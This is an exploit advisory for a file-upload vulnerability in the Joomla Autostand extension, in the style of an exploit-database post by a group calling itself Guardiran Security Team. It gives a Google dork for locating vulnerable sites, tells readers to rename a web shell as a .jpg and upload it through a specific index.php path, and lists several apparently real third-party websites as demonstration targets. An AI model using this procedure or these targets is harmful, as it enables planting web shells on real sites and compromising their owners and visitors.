######################################################## # Exploit Title: Joomla Autostand File Upload Vulnerability ######################################################## # Google Dork: inurl:/images/autostand/ # Date: [22/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://100cms.org/extension/joomla/4801-Autostand] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # This Is Like As RFU Bug. # You Can Upload Your Image In Your Target. # Also You Can Bypass Your Shell To .jpg Then Upload It In Target. ######################################################## # Exploit: # Add This Link To Target After This The Words: # /pt/ | /asp/ And The Other Words # {/index.php?option=com_autostand&func=newItem} ######################################################## # Demo: # http://smartXonecity.com/pt/index.php?option=com_autostand&func=newItem # http://smaXrtonecity.com/pt/index.php?option=com_autostand&func=newItem #http://www.antaresXmotors.cl/asp/index.php?option=com_autostand&func=newItem # http://autoschapaXs.com/index.php?option=com_autostand&func=newItem # http://lepetitvo.cXom/index.php?option=com_autostand&func=newItem # http://www.geeX-wagen.co.uk/index.php?option=com_autostand&func=newItem # http://www.auXtorimessafranco.com/index.php?option=com_autostand&func=newItem # http://www.fXirstcar45.fr/annonces-automobile/newitem ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################